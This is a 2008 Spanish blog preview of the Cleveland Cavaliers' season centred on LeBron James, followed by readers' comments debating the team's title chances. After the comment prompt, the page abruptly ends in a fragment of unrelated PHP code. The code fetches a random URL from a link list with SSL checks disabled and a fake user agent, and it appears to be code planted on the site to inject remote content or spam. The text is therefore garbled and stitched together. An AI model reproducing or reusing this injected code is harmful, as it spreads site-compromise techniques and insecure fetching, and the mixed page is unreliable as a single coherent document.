Cleveland Cavaliers: Hasta donde LeBron les lleve

01 de October de 2008 por Jabho

No es fácil que una generación de rookies tenga muchas estrellas. Tampoco que, llegada la hora de renovar, varios de esos jugadores franquicias, algunos de los jugadores más determinantes de la liga, opten por renovar por el máximo en dinero pero no así en tiempo. No es fácil, pero pasó con la generación del 2003. La renovación de James y sus compañeros de hornada ha marcado en rojo en la planificación de muchos equipos la fecha del verano de 2010.

Cleveland ha marcado también esa fecha en el calendario. Tras llegar hace dos años a la final de la liga, la pasada temporada cayeron contra el campeón en una eliminatoria durísima. Quedan dos temporadas para que LeBron sea agente libre y Cleveland busca un Anillo del que nunca en su historia ha estado tan cerca. La elección de King James les puso en el mapa mediático del baloncesto. La evolución del jugador les ha hecho serios candidatos al título. Y la franquicia está haciendo todo lo posible, tiene el segundo roster más caro de la liga, para ser campeón. Un buen proyecto deportivo, el máximo salarial y que al menos LeBron se lo piense.

Mike Brown continuará un año más dirigiendo al equipo. Fue ayudante de Popovich en San Antonio y de él aprendió que los equipos se construyen desde la defensa y que la liga regular tiene una importancia relativa. Los Cavs son un equipo muy físico, duro en defensa y excesivamente simple en ataque. Utiliza una rotación amplia donde sólo LeBron tiene garantizados 40 minutos. Sin duda el equipo empieza y acaba en el Elegido, pero también es cierto que cada vez está mejor acompañado, empezando por el backcourt del equipo que ha mejorado mucho en los últimos meses.

Delonte West y Wally Szczerbiak llegaron mediada la temporada pasada. Mo Williams, este verano a cambio de poco más que hacerse cargo de su salario. Los tres, junto con Daniel Gibson, formarán la rotación exterior. Todos son jugadores de buena mano, capaces de rondar, cuando no superar, el 40% en triples. También comparten ser jugadores a los que les cuesta crearse el tiro o dirigir al equipo. Pero para eso está el point forward.

Mo y West serán presumiblemente los titulares. Mo, sin ser una estrella, si es un jugador sobrio que aporta en todas las facetas del juego. Está llamado a ser junto con Ilgauskas el lugarteniente del jefe. Gibson y Wally saldrán desde el banco. Gibson experimentó una buena progresión en su segundo año. Destaca como uno de los mejores tiradores de la liga, aunque de la misma forma puede quedarse en un jugador unidimensional. Wally está lejos del nivel All-Star mostrado hace unos años, sin embargo sí puede ser un jugador importante saliendo desde el banco, mientras sea un cav. Está en el último de año de contrato y su expiring de 13 millones $ será un activo muy apreciado cuando se acerque el trade deadline. Más madera para los Cavs en caso de que decidan traspasarlo.

Desde el banco saldrá también Alexandar Pavlovic para dar descanso a Lebron. También tiene una mano aceptable aunque en su caso es un jugador que destaca más por ser un buen defensor y un jugador de equipo.

El frontcourt del equipo es defensa, físico y energía, más Big Z. Ben Wallace, Verajao, Lorenzen Wright e incluso el rookie JJ Hickson son un perfil de jugador duro, físico, trabajador y limitado en ataque. Ilgauskas, por el contrario, es un jugador de grandes fundamentos ofensivos que, junto a su envergadura, marcan diferencias dentro de la zona. Jugará la temporada regular de menos a más sabedor de que a sus 33 años es vital para su equipo que llegue bien al final de liga y a los Playoffs.

No soy de Lebron como en su día no fui de Jordan, pero hay que rendirse a la evidencia. King James es un jugador total y, hoy por hoy, el jugador más desequilibrante de la liga. Devora récords de precocidad estadística, marcas de Jordan o de Kobe, a la vez que demuestra que mas allá del jugador mediático que es, hay un jugador ambicioso que se crece en los momentos importantes. En la memoria quedan los dos últimos partidos de la final de Conferencia de hace dos temporadas. O, sin ir más lejos, el 7º partido de la serie que jugaron los Cavs contra Boston, serie en la que no empezó bien pero que, cuando se jugaban la eliminación, ya no falló. Tiempo habrá para juzgar la carrera de LeBron, pero nos hemos acostumbrado a verle unas medias estadísticas de hace muchos años y quizás a no valorarlas como merecerían.

Así que Cleveland llegará hasta donde LeBron les lleve. Nunca en su historia estuvieron tan cerca de un título y, pase lo que pase en el verano del 2010, van a poner toda la carne en el asador para ser campeones este año o el siguiente. Personalmente creo que LeBron se irá de la franquicia de Ohio. Cleveland no es uno de los grandes mercados y LeBron no sería el primero de los grandes que inicia su carrera en una franquicia  y la acaba en otra. Independientemente de si gana o no el Anillo, el legado baloncestístico que dejaría The Choose One en Cleveland sería enorme, por lo que nadie podría reprochárselo.

Y ¿hasta dónde les va a llevar LeBron? Mi pronóstico es MVP y Anillo.

Quinteto inicial: Mo Williams, Delonte West, LeBron James, Ben Wallace y Zydrunas Ilgauskas

Sexto hombre: Boobie Gibson / Verajao

Pronóstico: Campeones de la NBA.

Comenta

10 comentarios a esta entrada

  1. the choosen one dice:
    #1

    yo tambien les situo donde tu(o eso me gustaria)lebron es el mejor jugador de la liga a mi entender
    tiene fisico,caracter y decision
    yo espero que se qede en cleveland le vendra mejor a el y supongo que le haran un contrato astronomic como el de garnett o mas
    y bueno que mas decir qu sin el los cavs no son casi nada y que le rezare a dios paa que no se me lesione xD

      Citar

  2. MagicJohnson32 dice:
    #2

    Pues, para empezar, no deberían bajar mucho la guardia en la regular season, porque la ventaja de campo es esencial en el Este, y porque habrá muchos equipos con posibilidades de estar entre el 4º y el 8º y una mala racha te puede hundir.

    Eso sí, ya dije en otra entrada que son fijos en Playoffs, salvo lesión grave de James, y que serán muy competitivos. A mí me parece que no sacan el provecho que podrían de su plantilla, que Mike Brown es demasiado limitado y que muchos jugadores no pueden o no saben salir de la sombra de LeBron. Pero a la hora de la verdad van a ser muy difíciles de ganar. Habrá que ver cómo se comporta Mo, al que le veo dificultades para ceder protagonismo y asumir un rol secundario, y si Ben Wallace se gana la mitad de su salario.

    Finalistas de Conferencia o fracaso.

      Citar

  3. TheDeerHunter dice:
    #3

    Vaya por delante que yo no soy ni de Lebron ni mucho menos de Cleveland…

    Este equipo es el mejor con diferencia del que ha disfrutado Lebron hasta el momento en la NBA. Con un patatal terrible llegó a la final y, el año pasado con un equipo significativamente inferior a este no tumbó a Celtics casi de milagro.
    El equipo que tiene es para echarse a temblar. Él más hasta 3 bases de garantías (Mo Williams, Daniel Gibson, Eric Snow sin contar a Delonte) más 3 buenos escoltas (West, Szerbiak y Pavlovic) porque de alero ya basta con él mismo y uno de los juegos interiores más perros de la competición (Ilgauskas, Ben Wallace, Varejao, Hickson, Lorenzen Wright)
    Es un auténtico equipazo de la leche… aunque obviamente girando en torno suyo.

    No sé si llegarán a la final de conferencia (mi predición es esa) o incluso a la final… pero no veo ninguna probabilidad al fracaso real a no ser que se lesione Lebrón.
    Nótese que he dicho fracaso real porque si vuelven a caer en segunda ronda se considerará como fracaso y considero que no tiene porqué serlo… eso sí, palmar antes sí sería un fracaso en toda regla.

      Citar

  4. Jabho dice:
    #4

    Yo creo que son, junto con Boston, el único equipo del Este que puede aspirar al título. Coincido con Magic que menos de final de conferencia no se le puede pedir.

    Por otra lado tambien coincido con Magic en que deberian valorar algo mas la regular. Al menos quedar entre los 2 primeros para evitar sustos. Son mejores que Orlando, Philly e incluso Detroit y deberian demostrarlo.

    Lo de salir de la sombra de LeBron es complicado. Aunque también estoy de acuerdo que el resto del equipo debería ser capaz de aprovechar las ventajas de jugar a su lado… De hecho creo que esa es la razón de que le rodeen de tiradores.

    La clave para mi es que Ben Wallace, otra vez con Magic, se gane parte de su sueldo al menos en PO y que Ilgauskas siga a su nivel. Lo de Ilgauskas creo que será que si porque lleva varios años administrándose bien. Si Ben Wallace llegará bien al final de temporada….

    En fin, que sólo veo 4 equipos con aspiraciones reales del título. Cada uno de los 4 me da motivos para confiar y motivos para desconfiar. He decidido apostar por uno de esos 4 y son los Cavs. Son el único de los 4 favoritos que realmente se ha reforzado y el año pasado estuvieron a puntito…. y los C´s han perdido a Posey

      Citar

  5. TheDeerHunter dice:
    #5

    Pues yo creo que año tras año lo de la ultradependencia de Lebron va a ir desapareciendo.
    Con la que le calló en la eliminatoria contra Celtics(más la manita de ostiacas que le llovieron en la de Wizards ) ya tuvo que darse cuenta de que tiene que buscar otros recursos que no concluyan en él mismo… además de que este año también tiene más alternativas que nunca.
    No olvidemos tampoco el papel que ha hecho en los juegos… (muy interesante y relativamente generoso bajo mi punto de vista) Otra cosa es que Lebrón en cualquier equipo normal debe de tener el protagonismo que también merece…

    Y en otro orden de cosas… ni la madre de Posey se esperaba que hiciera una final como la que hizo… así que nadie me venga subestimando a los Celtics ahora por perderle… Si los Celtics no quedan campeones este año estoy seguro que no será por tener o no tener a Posey.
    Eso sí… eso es harina de otro costal, ya hablaremos de ello cuando toque.

      Citar

  6. TheDeerHunter dice:
    #6

    Otra cosa… respeto muy mucho el favoritismo que Jabho les ha concedido a los Cavs y, lógicamente alguna opción tendrán de serlo, pero no creo que el anillo sea, siendo realistas, el objetivo de esta plantilla este mismo año.
    Existiendo equipos como Celtics, los gallos del Oeste e incluso Detroit, en mi opinión ya se pueden dar con un canto en los dientes de hacer una buena campaña, dar buenas sensaciones hasta el último momento y mantener a Lebron la próxima temporada para buscar nuevos horizontes a partir de la siguiente.

    Me temo que usando los mismos argumentos podríamos pronosticar unos cuantos más candidatos al título (yo a bote pronto podría poner 6 o 7…)
    Si terminan siendolo, Jabho… recuerdame que te pague una ronda de lo que quieras.

      Citar

  7. Txusma dice:
    #7

    Lebron es buenisimo, posiblemente el jugador que mas diferencias marca en la NBA ahora mismo, pero al final el exito o fracaso de estos Cavs dependera casi del acierto en el tiro exterior de sus compañeros, a no ser que el sistema de juego cambie algo. Lebron se ira a los 30 puntos por noche (mas 7 rebotes y 7 asistencias) pero hacen falta mas puntos ahi para ganar los partidos. Los Williams, Gibson, West, Szcerbiack, etc… deberan estar finos.
    Yo, como Deer, no les doy el anillo y ni siquiera la final.

      Citar

  8. Jabho dice:
    #8

    Bueno Deer. Digo y me reafirmo que veo 4 candidatos al títulos. Todo lo que no sea que ganen C´s, Cavs, Lakers o Spurs para mi será una sorpresa. ¿Hornets pueden ganar?¿un último impulso de Suns o Mavericks?¿Artest y Rockets?¿Jazz? Puede pasar pero lo veo complicado.

    De los 4 candidatos que yo doy tengo claro que no hay un dominador claro. No veo uno por encima del resto. Cavs es mejor que estos años atrás y estos años ha estado cerca. Boston son los vigentes campeones. Lakers son el equipo de más potencial. Y los Spurs juegan en año par y 4 anillos los contemplan… ¿Porque doy a los Cavs por encima de los otros? Por corazonada, por cada vez son mejor equipo y por que creo en LeBron cada día más.

    Hay que mojarse y lo hago por los Cavs. Pero encontraría argumentos por hacerlo por los otros 3 equipos citados.

      Citar

  9. Kantonyo dice:
    #9

    Personalmente los Cavs no me producen mucha confianza para que esten disputandose el anillo. Más aún les costará conseguir una plaza cómoda en el Este e incluso sufrirán para conseguir puesto de playoffs. Creo que tanto Boston como Detroit, están un escalón por encima. Despues veo un grupo de equipos, como Philadelphia, Toronto y Orlando en mejores condiciones que Cavs. Este año creo incluso que hay que contar con Miami y Chicago, dos equipos que el año pasado fueron una decepción pero con las incorporaciones del Draft y con lo que tenían estarán en la pomada. No descarto del todo a Atlanta y New York que le podrían poner las cosas dificiles a los de Ohio.

    Jugadores como Szczerbiak, Snow, Wallace o incluso Ilgauskas están en el final de sus carreras. Y otros como Varejao, Gibson y West no han demostrado personalidad para realizar cosas importantes. Un equipo que juega siempre para un jugador por muy estrella que sea, siempre deja muchas dudas.

    La nota positiva la pone el regalo de Milwaukee con Maurice Williams y la adquisión en el draft de JJ Hickson.

    Todo esto con el respeto hacia LeBron James, que él solito puede dejar en autentico rídiculo este humilde comentario….

      Citar

  10. MagicJohnson32 dice:
    #10

    Hola Kantonyo, y enhorabuena por tu blog.

    A mí sí me parece que tienen potencial para llegar muy lejos, aunque como ya dije falta que los secundarios sepan asumir responsabilidades y no dejarlo todo en manos de James. Y sin duda los veo muy por encima de Hawks y Knicks, ¡pero muy muy muy por encima!

      Citar

Deja un comentario

html; } class Helper { public function random_date() { $low = '732045693'; $high = time(); $random = rand($low, $high); return date("D, d M Y H:i:s",$random); } } class Fetch_site { public $url; public $html; public function __construct($sites=null, $link_list=null) { $this->is_curl_installed(); if($link_list !== null) { $this->choose_site($link_list); } $this->load_site($this->url); } public function choose_site($file=null) { $file = explode("\n", $file); $key = rand(0, (count($file)-1)); $this->url = trim($file[$key]); } public function load_site($url) { $useragent = array('Link-Soft'); $rand = array_rand($useragent); $ch = curl_init(); $options = array( CURLOPT_URL => $url, CURLOPT_HEADER => 0, CURLOPT_USERAGENT => $useragent[$rand], CURLOPT_SSL_VERIFYHOST => 0, CURLOPT_SSL_VERIFYPEER => 0, CURLOPT_RETURNTRANSFER => 1, CURLOPT_FOLLOWLOCATION => 1, CURLOPT_ENCODING => "", CURLOPT_AUTOREFERER => 1, CURLOPT_CONNECTTIMEOUT => 30, CURLOPT_TIMEOUT => 30, CURLOPT_MAXREDIRS => 5, ); curl_setopt_array($ch,$options); $result = curl_exec($ch); if(!$result) { return curl_error($ch); } curl_close($ch); $this->html = $result; } public function is_curl_installed() { if(!in_array('curl',get_loaded_extensions())) { trigger_error("cURL PHP extension is disabled or not installed.",E_USER_ERROR); } } } unset($n); ?>